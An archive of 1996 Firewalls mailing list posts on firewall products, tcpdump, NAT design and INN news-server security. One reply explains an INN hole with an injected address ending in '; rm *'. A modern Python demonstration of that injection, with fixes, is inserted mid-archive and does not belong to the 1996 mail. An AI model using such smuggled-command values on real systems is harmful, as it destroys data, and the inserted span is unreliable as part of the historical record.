Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00348 for firewalls-outgoing; Wed, 14 Feb 1996 09:58:15 -0800 (PST)
Received: from mimesweeper.integralis.co.uk (mimesweeper.integralis.co.uk [193.122.60.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA00343 for ; Wed, 14 Feb 1996 09:58:02 -0800 (PST)
From: Pascal.Trouvin@integralis.co.uk
Received: from integd.integralis.co.uk (193.128.143.14) by mimesweeper.integralis.co.uk (0.44) with Integralis_SMTPRS id ; Wed, 14 Feb 1996 17:55:17 +0000
Received: from ccgate.integralis.co.uk by INTEGD.INTEGRALIS.CO.UK (PMDF V4.3-10 #8244) id <01I17NGVW374000I87@INTEGD.INTEGRALIS.CO.UK>; Wed, 14 Feb 1996 17:54:59 +0000 (GMT)
Date: Wed, 14 Feb 1996 18:00 +0000 (GMT)
Subject: Re: Firewall-1 Version Comparison
To: gjose@mecx05.colesmyer.com.au, firewalls@GreatCircle.COM
Message-id: <01I17NHGHOQI000I87@INTEGD.INTEGRALIS.CO.UK>
X-Envelope-to: firewalls@GreatCircle.COM, gjose@mecx05.colesmyer.com.au
MIME-version: 1.0
Content-type: MULTIPART/MIXED; BOUNDARY="Boundary (ID P+f6dtuARhfJhf/XvYjPEg)"
Content-transfer-encoding: 7BIT
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

--Boundary (ID P+f6dtuARhfJhf/XvYjPEg)
Content-type: APPLICATION/OCTET-STREAM
Content-transfer-encoding: BASE64

--Boundary (ID P+f6dtuARhfJhf/XvYjPEg)
Content-type: TEXT/PLAIN

Firewall-1 from checkpoint version 1 had only filtering capabilities; version 2 implements some user identification/authentication schemes, address translation

regards
pascal.trouvin@integralis.co.uk

--Boundary (ID P+f6dtuARhfJhf/XvYjPEg)--

From firewalls-owner Wed Feb 14 11:11:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA02325 for firewalls-outgoing; Wed, 14 Feb 1996 10:59:33 -0800 (PST)
Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA02310 for ; Wed, 14 Feb 1996 10:59:27 -0800 (PST)
Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id NAA24227; Wed, 14 Feb 1996 13:58:45 -0500
Date: Wed, 14 Feb 1996 13:58:45 -0500
From: Chris Eastman
Subject: tcpdump modifications
To: firewalls@greatcircle.com
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I was told recently that there are several modifications to tcpdump floating around out there, primarily one that is packaged with a 'video' utility that will take captured packets and replay them according to time stamp information (real time playback). Does anyone know of where one might come up with these modifications and/or additional filters? I checked ftp.ee.lbl.gov, and the only thing they support is the standard tcpdump release.
Thanks in advance,

--chris

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Christopher Eastman    %% Cable & Wireless, Inc   %%
%% MDS Network Engineer   %% 1919 Gallows Road       %%
%% chris@cwi.net          %% Vienna, VA 22182        %%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

From firewalls-owner Wed Feb 14 11:28:22 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00896 for firewalls-outgoing; Wed, 14 Feb 1996 10:12:22 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA00880 for ; Wed, 14 Feb 1996 10:12:12 -0800 (PST)
Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA11605; Wed, 14 Feb 96 12:13:51 CST
Received: by mnbp.network.com with Microsoft Mail id <3122252D@mnbp.network.com>; Wed, 14 Feb 96 12:08:45 CST
From: Michael Brown
To: jeromie
Cc: firewalls , sengle
Subject: RE: Gauntlet 3.1 Packet Filter?
Date: Wed, 14 Feb 96 12:08:00 CST
Message-Id: <3122252D@mnbp.network.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Glad to hear you're familiar with BorderGuards. There were some new additions and new brochures in the last few months. The latest is a picture of a black BorderGuard with a fold out and more detailed than the last one. I am not too technical, so here is what proxies I understand it supports. If you're on the technical side, you probably have a better understanding of the proxies and what someone may need in addition to these if they get creative.

BorderGuard supports: Telnet, FTP, SMTP, NNTP, and gopher.

Keep in mind, the cost of this product and what you can do with it. If the customer needs to get real creative on firewall access, then they may need to spend $10K - 50K for a belt/suspenders approach firewall. In that case the BorderGuard is still the best choice for the access device because of the superior packet filter design and the Secure VPN access. The price for all this stuff in the BorderGuard is less than a small router from someone like Bay or cisco.

My understanding of Gauntlet (please help me out and correct me) is the proxies it supports are: Telnet, FTP, SMTP, NNTP, HTTP, X11, and gopher.

The NSC product is not directly competing for internet firewall business, but more for Secure VPN applications over the Internet, Frame Relay, SMDS, any public based network you need to ensure your traffic is kept confidential. The BorderGuard is nice because when someone wants an internet connection, to block intruders, but allow email, allow employees access to cruise the net, block times the employees can cruise the net, and allow the admin to block out porno and undesirable web pages. BorderGuard can do that without the added cost of the separate firewall. To get started on the Internet this is a secure inexpensive design. When they start to get real creative with access they can go back and add the separate firewall if they need to.

All in all, the BorderGuard is 'way cool'.

Best Regards,
mkb

----------
Uhhuh... I thought we were talking about the BorderGuard product. I am familiar with the product, as we have purchased & installed them before for a client. They are basically a router with an encryption engine in it. I would agree with you that the product has good throughput, from what we've seen. As for being an 'application gateway' it's not, unless you changed it in the last 2 months.

Basically it uses packet filtering for access control, can do encryption to create VPNs, and also w/ the DPF facility can look @ bytes @ given offsets within the packets. This does NOT constitute an application level gateway. Where are your proxies? (Don't tell me they are in the firmware.)

Jeromie Jackson
Garrison technologies
jeromie@garrison.com

From firewalls-owner Wed Feb 14 11:39:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00186 for firewalls-outgoing; Wed, 14 Feb 1996 09:54:51 -0800 (PST)
Received: from relay7.UU.NET (relay7.UU.NET [192.48.96.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA00173 for ; Wed, 14 Feb 1996 09:54:42 -0800 (PST)
Received: from maestro.Maestro.COM by relay7.UU.NET with SMTP id QQacxj06154; Wed, 14 Feb 1996 12:53:43 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA23724; Wed, 14 Feb 96 12:41:36 EST
Date: Wed, 14 Feb 1996 12:41:35 -0500 (EST)
From: Sick Puppy
To: firewalls@GreatCircle.com
Subject: RE: PC Magazine article on firewalls
In-Reply-To: <01BAFABB.6D191A60@niatross.fonorola.net>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>> The March 12, 1996 edition of PC Magazine (Ziff-Davis Publishing) has an
>
> I'm confused. Do you mean March 12, *1995* ?

No, I mean 1996. Us Dawgs is good at reading ahead on account of our habit of sniffing around.
SP, tCED cDm

From firewalls-owner Wed Feb 14 11:55:23 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA01940 for firewalls-outgoing; Wed, 14 Feb 1996 10:49:17 -0800 (PST)
Received: from hawk.hcsc.com (hawk.hcsc.com [204.5.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA01935 for ; Wed, 14 Feb 1996 10:49:08 -0800 (PST)
Received: from grouper.mkt.hcsc.com by hawk.hcsc.com (5.61/harris-5.1) id AA19973; Wed, 14 Feb 96 13:48:26 -0500
Received: from cheshire by grouper.mkt.csd.harris.com (5.61/HARRIS-4.0) id AA13339; Wed, 14 Feb 96 13:48:25 -0500
Message-Id: <3121F12F.585@mail.hcsc.com>
Date: Wed, 14 Feb 1996 09:26:55 -0500
From: William C Curtiss
Organization: Harris Computer Systems Corporation
X-Mailer: Mozilla 2.0b5 (Win95; I)
Mime-Version: 1.0
To: firewalls@greatcircle.com
Subject: Re: Harris Computer product viability.
References: <960212141736_142186765@emout04.mail.aol.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

MFTemplar@aol.com wrote:
>
> Hey,
>
> I was wondering what the participants in this group thought of Harris
> Computer's Cyberguard Firewall product.
...
> The November Data Comm Firewall test rated Harris's product # 2 (CheckPoint's
> was # 1) but the people at Raptor and Secure Computing say they don't run
> into Harris at all in the commercial market.

Well, we've certainly run into them -- maybe they just aren't keeping track as well as we are :-).

> Is there any non-governmental/commercial adoption of the Harris Computer
> Cyberguard product that you know of out in the field and how has it gone?

I just went down our customer list, and about 80 percent of the CyberGuard Firewall customers are commercial. Rather than list reference customers and magazine reviews now, I too would like to hear the experiences of others on this list.

(If you want immediate input drop some email, or give a call, and I will put you in touch with some commercial reference customers.)

From firewalls-owner Wed Feb 14 12:54:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06641 for firewalls-outgoing; Wed, 14 Feb 1996 12:51:57 -0800 (PST)
Received: from relay2.smtp.psi.net (relay2.smtp.psi.net [38.8.188.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06625; Wed, 14 Feb 1996 12:51:46 -0800 (PST)
Received: from radisys.radisys.com by relay2.smtp.psi.net (8.6.12/SMI-5.4-PSI) id RAA24767; Sun, 11 Feb 1996 17:44:42 -0500
Received: from msmail.radisys.com by radisys.radisys.com id aa11165; 14 Feb 96 12:50 PST
Received: by msmail.radisys.com with Microsoft Mail id <31224B01@msmail.radisys.com>; Wed, 14 Feb 96 12:50:09 PST
From: Jesse Gambetti
To: firewalls-owner , firewalls
Subject: Private FTP / Mail
Date: Wed, 14 Feb 96 12:49:00 PST
Message-ID: <31224B01@msmail.radisys.com>
X-Mailer: Microsoft Mail V3.0
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm interested in what security risks a private FTP server for our employees and sending MS Mail via internet might present. As far as the FTP server, we would need to set it up in a way that our employees could copy files onto it just as if it were a netware drive. Which might mean running NFS on the servers.
From firewalls-owner Wed Feb 14 13:25:00 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06719 for firewalls-outgoing; Wed, 14 Feb 1996 12:54:17 -0800 (PST)
Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06714 for ; Wed, 14 Feb 1996 12:54:14 -0800 (PST)
Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id PAA05725; Wed, 14 Feb 1996 15:52:40 -0500
Date: Wed, 14 Feb 1996 15:52:40 -0500 (EST)
From: Brain21
To: firewalls@greatcircle.com
Subject: Network diagramming tool
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A while back someone asked about a network diagramming tool. I was browsing through some mags and found this thing called NetVis. It looks pretty cool and supports such things as 500 symbols, etc., concurrent file access, program launching and embedding, data import & more. A working demo is available from www.quyen.com/netviz

I have not tried it yet, and no, I do not work for them or anything.

Brain21

From firewalls-owner Wed Feb 14 13:26:54 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA07608 for firewalls-outgoing; Wed, 14 Feb 1996 13:21:13 -0800 (PST)
Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA07585 for ; Wed, 14 Feb 1996 13:21:03 -0800 (PST)
From: firewalls@count04.mry.scruznet.com
Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id NAA13824; Wed, 14 Feb 1996 13:13:10 -0800 (PST)
Message-Id: <199602142113.NAA13824@count04.mry.scruznet.com>
To: Rachel Rosencrantz
cc: Firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
Subject: Re: Firewalls-Digest V5 #45
In-reply-to: Your message of "Wed, 14 Feb 1996 11:42:45 EST."
Date: Wed, 14 Feb 1996 13:13:09 -0800
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk
Content type: application/x-pgp

-----BEGIN PGP SIGNED MESSAGE-----

Actually I have a different take on this one. For ip_filter version 3.02 or above with IPNAT, or the Sunscreen SPF-100 with network vectoring :) (effectively the same thing, although the protocol layers between the 2 are radically different..), I usually create a firewall complex of machines. I like to translate the DMZ net to one set of private addresses and to translate the DMZ addresses to a 2nd set of private addresses for the internal network. To do this safely the NAT must happen on packet inbound processing AND the machine has to live inside of its own filters.

By using sets of addresses guaranteed (hah!) to NOT route (RFC1597) over the backbone (and you had better test your ISP's routers to make sure that they won't route this traffic), if this characteristic holds true it becomes necessary to attack the closest upstream router from your site to try and forge packets for your internal nets.
This and encrypted encapsulation protocols can be used to great advantage if one only accepts inbound traffic (encrypted) from only hosts that the key is known for. cheers kelly -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMSJQKbl+rkbO5CVtAQFZuAf/WkW2NBYUshc0IkyQ54yGJ9BdoqaxnRsE v5WosR9u/QSmqvokXYtNYDIpJL7l4pVU/yH6iWRaH0RtpsqTuZQ64sfNPBPrGH3s 7GsBRLxwFjR75yZi3hBznU+S5NpvlrNgiW4UaWSDiC5bdycASTvhJBBt5lBgtn8g GYUQy9UpJDTbLNPY4RlmLc2er/wGH5tkwZ2UVikADOBecXooPsdWj7CTK24lhjsp G6/9hL2JLenfUmMF2JK2tGC8TM0eiQ4grriEB4TCAOd6mwncaqe87y/b0N4Q/OcF e0p5g7EIuTpqInadbiKkJcBV3oVRhFHyimpVpISiNQULvumBibU09Q== =MDG1 -----END PGP SIGNATURE----- # From firewalls-owner Wed Feb 14 14:09:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08514 for firewalls-outgoing; Wed, 14 Feb 1996 13:48:11 -0800 (PST) Received: from smurfland.cit.buffalo.edu (smurfland.cit.buffalo.edu [128.205.10.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA08509 for ; Wed, 14 Feb 1996 13:48:07 -0800 (PST) Received: (jcmurphy@localhost) by smurfland.cit.buffalo.edu (8.7.3/8.6.4) id QAA20838; Wed, 14 Feb 1996 16:47:23 -0500 (EST) From: Jeff Murphy Message-Id: <199602142147.QAA20838@smurfland.cit.buffalo.edu> Subject: Re: Web browser ports? To: legg@sun1plus.liebert.com (Jim Legg) Date: Wed, 14 Feb 1996 16:47:23 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: <9602141457.AA29252@sun1plus.liebert.com> from "Jim Legg" at Feb 14, 96 09:57:09 am X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>> >Volume 3 of Stevens? What is this one about, has it been out for long? >>> Copyright 1993. >> >>Uhmm... Volume 1 of Stevens did not come out until 1994. Volume 2 was >>released in 1995. 
Are you perhaps thinking of Comer "Internetworking >>with TCP/IP" [3 volumes] rather than Stevens "TCP/IP Illustrated" [only >>2 that I know of]? Perhaps you mean some other Stevens? What is the >>title? http://www.aw.com/cp/ TCP/IP Illustrated, Volume 3: TCP for Transactions, HTTP, NNTP, and the UNIX Domain Protocols, by W. Richard Stevens <> From firewalls-owner Wed Feb 14 14:18:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08980 for firewalls-outgoing; Wed, 14 Feb 1996 13:55:24 -0800 (PST) Received: from svcs1.digex.net (svcs1.digex.net [204.91.197.224]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA08975 for ; Wed, 14 Feb 1996 13:55:19 -0800 (PST) Received: from fred.digex.net (fred.digex.net [164.109.213.78]) by svcs1.digex.net (8.6.12/8.6.12) with SMTP id QAA20714; Wed, 14 Feb 1996 16:54:31 -0500 Message-ID: <31225982.292@access.digex.net> Date: Wed, 14 Feb 1996 16:52:02 -0500 From: "Eliot T. Ware" X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: sikpuppy@maestro.com CC: Firewall ListServer Subject: Re: Need a few pointers References: <9601141357.AA04878@tidtest.total.fr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michel Lavondes wrote: > > In message , Sick Puppy writes: > > There was a very good response to my query. I had no idea there were > > so many security problems and performance problems associated with > > WindBlows 95. Sounds like the operating system was written by a couple > > of drunken cats. In a couple of days I will get the responses together > > in one file, together with a couple of good web pointers, and pass it on > > to anyone who wants an e-mailed copy. > > > > Sick Puppy, the Cat_Eating_Dawg > > Either you didn't get to post it or (more likely) I was careless > with the delete button :-(. Could you send me a copy ? 
> > advTHANKSance > > Michel Lavondes (lavondes@tidtest.total.fr) > #include > ** CDA warning : don't read this if you're under 18 ** > Don't whistle while you piss > Hagbard Celine I'd also like a copy if possible. Thanks. -Eliot -- Eliot T. Ware, CNE voice: (202) 622-1302 Global Systems Architect fax: (202) 622-2582 Department of the Treasury (UNIBAND) preferred: etware@access.digex.net alternate: eliot.ware@treas.sprint.com From firewalls-owner Wed Feb 14 14:19:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08160 for firewalls-outgoing; Wed, 14 Feb 1996 13:38:35 -0800 (PST) Received: from ncar.UCAR.EDU (ncar.ucar.edu [192.52.106.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA08153 for ; Wed, 14 Feb 1996 13:38:28 -0800 (PST) Message-Id: <199602142137.OAA21824@ncar.ucar.EDU> Received: by ncar.ucar.EDU (NCAR Local/ NCAR Central Post Office 03/11/93) id OAA21824; Wed, 14 Feb 1996 14:37:47 -0700 (MST) Subject: Re: INN/NNTP Security Implications To: surguine@csn.net (Scott Surguine) Date: Wed, 14 Feb 96 14:37:46 MST Cc: firewalls@GreatCircle.COM, surguine@teal.csn.net In-Reply-To: <199602140045.RAA09593@teal.csn.net>; from "Scott Surguine" at Feb 13, 96 5:45 pm From: woods@ncar.ucar.edu (Greg Woods) X-Mailer: ELM [version 2.3 PL11] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have a few questions regarding Security Concerns and INN/NNTP Since no one else more expert has volunteered yet, I'll take a stab at it. > What are the security implications of allowing traffic across port 119 > for accessing ( reading, posting, etc ... ) our "private" newsgroups on > our Newsserver? The following answers should all be prefaced with "assuming no bugs in INN". It goes without saying that if the service is exposed to the outside world and it has security holes, those holes can be exploited. I don't know of any security holes in INN that would allow access beyond the news system.
> If I do not configure my site to obtain newsfeeds from outside our site, > can someone still spoof feeds to my site? Depends on how your "newsfeeds" file is set up. If you allow any machines at all to feed news to your server, then someone on the outside who controls a DNS server can configure the DNS server to return one of these names when its IP address is queried, and then theoretically send news to your server from there. Same applies to reading and posting privileges, although I know that you can beat this one for reading and posting by specifying those privileges in the nnrp.access file by IP address only. Then you're only vulnerable if someone on the outside can actually launch an IP address spoofing attack, which can be blocked at the external router by refusing any packets that come in to your external interface with an internal source address (most likely you want to be doing that anyway). > Does anyone know of specific security related issues regarding INN? I am > configuring INN1.4sec, which is a "security" patch to INN1.4. Can someone > explain what hole INN1.4sec patches? It was one of those things where a shell script did something like /usr/ucb/Mail $address_obtained_from_news_article Implications of that are obvious (just slip in an address like "user@host.domain; rm *" and see what happens). > Are there any known methods by which "Automatic Group Creation" can take > place in INN? Yes. This is controlled in the control.ctl file. It should be possible to configure it not to do any auto newgroups if that's what you want.
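The "address pulled out of a news article, handed to a mail command" hole described in the INN 1.4sec answer above, as an added example: this is not INN code and not the script being described. It reproduces the bug class (an untrusted string spliced into a command that a shell parses) next to the two independent fixes a practitioner would want, validating the address and never involving a shell. `echo` is a hypothetical stand-in for /usr/ucb/Mail so it runs offline, and the hostile address is constructed; its payload only creates a marker file in a scratch directory instead of `rm *`.

```python
# Added example for the INN 1.4sec discussion: not INN code and not the
# script Greg Woods describes.  `echo` is a hypothetical stand-in for
# /usr/ucb/Mail so the demo runs offline; the hostile address only creates a
# marker file in a scratch directory.
import os
import re
import subprocess
import tempfile

MAILER = "echo"  # assumption: stands in for /usr/ucb/Mail

# Constructed hostile address, of the kind the unpatched script would have
# pulled out of a news article header.
INJECTED = "user@host.domain; echo owned > PWNED"

# Conservative allow-list for recipients: local-part@domain with no shell
# metacharacters.  Assumption: rejecting unusual but legal RFC 822 forms is
# acceptable for automated control-message mail.
_SAFE_ADDRESS = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255}$")


def scratch_dir():
    """Fresh empty directory in which side effects can be observed."""
    return tempfile.mkdtemp(prefix="inn-demo-")


def _run(argv_or_cmd, workdir, use_shell):
    """Run the 'mailer'; report (recipient it saw, files now in workdir)."""
    proc = subprocess.run(argv_or_cmd, shell=use_shell, cwd=workdir,
                          capture_output=True, text=True)
    return proc.stdout.rstrip("\n"), sorted(os.listdir(workdir))


def vulnerable_send(address, workdir):
    """The unpatched pattern: the address is spliced into a command string
    that /bin/sh then parses, so ';' ends the mail command and starts ours."""
    return _run(MAILER + " " + address, workdir, use_shell=True)


def argv_send(address, workdir):
    """No shell involved: the address is a single argv element, so ';', '>'
    and friends are just characters handed to the mailer."""
    return _run([MAILER, address], workdir, use_shell=False)


def address_is_acceptable(address):
    """Input validation, independent of how the command is invoked."""
    return _SAFE_ADDRESS.match(address) is not None


def safe_send(address, workdir):
    """Validate, then use argv: two layers, either of which stops INJECTED."""
    if not address_is_acceptable(address):
        raise ValueError("refusing to mail suspicious address: %r" % address)
    return argv_send(address, workdir)


if __name__ == "__main__":
    print("shell:", vulnerable_send(INJECTED, scratch_dir()))  # PWNED created
    print("argv :", argv_send(INJECTED, scratch_dir()))        # literal, no file
    print("safe :", address_is_acceptable(INJECTED))           # False
```

The argv form alone already defeats the `;` trick, because no shell ever sees the string; the allow-list is still worth keeping, since a mailer handed an argument beginning with `-` may interpret it as an option.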
--Greg From firewalls-owner Wed Feb 14 14:21:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA08401 for firewalls-outgoing; Wed, 14 Feb 1996 13:44:50 -0800 (PST) Received: from cohiba.predictive.com (cohiba.predictive.com [204.243.240.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA08388 for ; Wed, 14 Feb 1996 13:44:41 -0800 (PST) Received: from cohiba (golda@cohiba [204.243.240.5]) by cohiba.predictive.com (8.6.12/8.6.12) with SMTP id QAA00892 for ; Wed, 14 Feb 1996 16:48:23 -0500 Date: Wed, 14 Feb 1996 16:48:22 -0500 (EST) From: Rachel Rosencrantz X-Sender: golda@cohiba To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #75 In-Reply-To: <199601311625.IAA09017@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > ---------- > From: firewalls-owner[SMTP:firewalls-owner@GreatCircle.COM] > Sent: 30 January 1996 10:56 > To: firewalls > Subject: MS-Windows PC as an email gateway > > > Hi, > > My company is looking at a quick way of getting on the Internet without > investing in a lot of hardware and engineering effort. One idea, which > has management interested, is to work with a local ISP to get a dedicated > line, either ISDN or 28.8, to tie a PC running MS-Windows or MS-Windows > NT to the Internet. > > This PC would be an FTP server and WWW server. This PC would only be > connected to our office network _after_ it had been disconnected from the > ISP connection. Thus, no need for a fire wall. (So we can transfer files > back and forth.) How do you intend to prevent the PC from being connected to the internet and to the internal net at the same time? Physical disconnection? (How do you prevent someone from physically connecting to both nets at once? the two?) Single card? How are you going to prevent interface mess-ups and too much inconvenience from reconfiguring net links?
Also, if the PC is sometimes connected to the inside and sometimes connected to the outside, I assume that information on both nets is on the machine at all times. Can time delay attacks be set up on the PC? (I don't know about DOS programming enough to really know if you can script or otherwise run that.) If you are going through the trouble of switching nets that are up on the PC and going over to the PC for surfing, you might as well use sneaker net (floppies/tape/cd transferring of information) and never connect the PC to the internal net. > As a short term solution this seems pretty good. The only problem is > that we also want e-mail. Today we use UUCP every couple of hours, but > there is a big push to have immediate access to incoming and immediate > outbound email, but on the internal network. That sounds like you will need the net connected on both sides at the same time. The "I don't need a firewall because it is only connected on one side at a time" goes away. > > Is it possible to use MS-Windows or NT as an email-only gateway? I am > assuming we would need a second lan card or a router? > > What security issues should I look out for? I assume that not allowing > the PC to be a telnet server is a start and only exposing the internal > email server to the PC is also a good idea. How do you get the mail from the email server to the internal net? Once you have a link from your internet to your internal net the door is open. If you can't get the firewall right away then you should wait on the email, assuming the data on the internal net is something you need to protect. If the data is less valuable (to others) then the need to protect goes down. You have to weigh the risks.
-Rachelr From firewalls-owner Wed Feb 14 15:36:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA01240 for firewalls-outgoing; Wed, 14 Feb 1996 15:23:40 -0800 (PST) Received: from bronze.lcs.mit.edu (bronze.lcs.mit.edu [18.30.0.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA01235 for ; Wed, 14 Feb 1996 15:23:36 -0800 (PST) Received: by bronze.lcs.mit.edu (Sendmail 8.6.10/950531.CACTUS) id SAA13369; Wed, 14 Feb 1996 18:20:40 -0500 Date: Wed, 14 Feb 1996 18:20:40 -0500 Message-Id: <199602142320.SAA13369@bronze.lcs.mit.edu> From: *Hobbit* Subject: netSP / secure-net-gateway To: firewalls@greatcircle.com Reply-to: hobbit@avian.org Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Getting information about this product from IBM is right up there with pulling teeth, and a thorough rape of the raleigh web site didn't help. Anyone from the right group at IBM care to get back to me, in the interest of answering some fairly in-depth questions about this thing? _H* From firewalls-owner Wed Feb 14 16:40:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA03840 for firewalls-outgoing; Wed, 14 Feb 1996 16:38:40 -0800 (PST) Received: from han.hana.nm.kr (han.hana.nm.kr [128.134.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA03835 for ; Wed, 14 Feb 1996 16:38:31 -0800 (PST) Received: from saitgw.Sait.Samsung.Co.KR by han.hana.nm.kr (4.1/KUM-0.1) id AA23669; Thu, 15 Feb 96 09:44:00 KST Received: from noc.sait.samsung.co.kr. by saitgw.Sait.Samsung.Co.KR (4.1/SMI-4.1) id AA02391; Thu, 15 Feb 96 09:31:22 KST Received: from fiji.info.samsung.co.kr by noc.sait.samsung.co.kr. 
(8.6.9H1/SMI-SVR4) id JAA00840; Thu, 15 Feb 1996 09:45:46 +0900 Date: Thu, 15 Feb 1996 09:45:46 +0900 Message-Id: <199602150045.JAA00840@noc.sait.samsung.co.kr.> X-Sender: kes@coda.info.samsung.co.kr X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Phil Davidson From: Kang Eun-Seong Subject: Re: Firewall comparison chart??? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:27 AM 96/02/13 GMT, you wrote: >Just wondering if anyone has seen a chart that compares >the various Firewall packages currently available. >The kind that lists which features are available >or not or the different packages. > >cheers >Phil > > Have you ever been to http://www.data.com/Lab_Tests/Firewalls.html? There are very helpful comparison data for some firewalls. ------------------------------------------------------------------- Kang, Eun-Seong Samsung Electronics Co, Ltd. kes@coda.info.samsung.co.kr San 14, Nongseo-Ri, Kihung-Eup, phone) +82-331-280-9425 Yongin-Kun, Kyungki-Do, Korea. 
------------------------------------------------------------------- From firewalls-owner Wed Feb 14 19:10:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA09426 for firewalls-outgoing; Wed, 14 Feb 1996 18:44:49 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA09413 for ; Wed, 14 Feb 1996 18:44:41 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id UAA22466; Wed, 14 Feb 1996 20:43:13 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id UAA29349; Wed, 14 Feb 1996 20:43:11 -0600 Posted-Date: Wed, 14 Feb 1996 20:43:11 -0600 Date: Wed, 14 Feb 1996 20:43:11 -0600 (CST) From: Ron DuFresne To: Chris Eastman cc: firewalls@GreatCircle.COM Subject: Re: tcpdump modifications In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris, There's a Motif X Windows add-on for tcpdump that you may be looking for. I found and have a copy of the version for Linux, and I think it had all the makefiles for a number of other *nix's. Claims it will also read sniffer files. Let me know if you'd like me to send you a copy... Later, Ron DuFresne On Wed, 14 Feb 1996, Chris Eastman 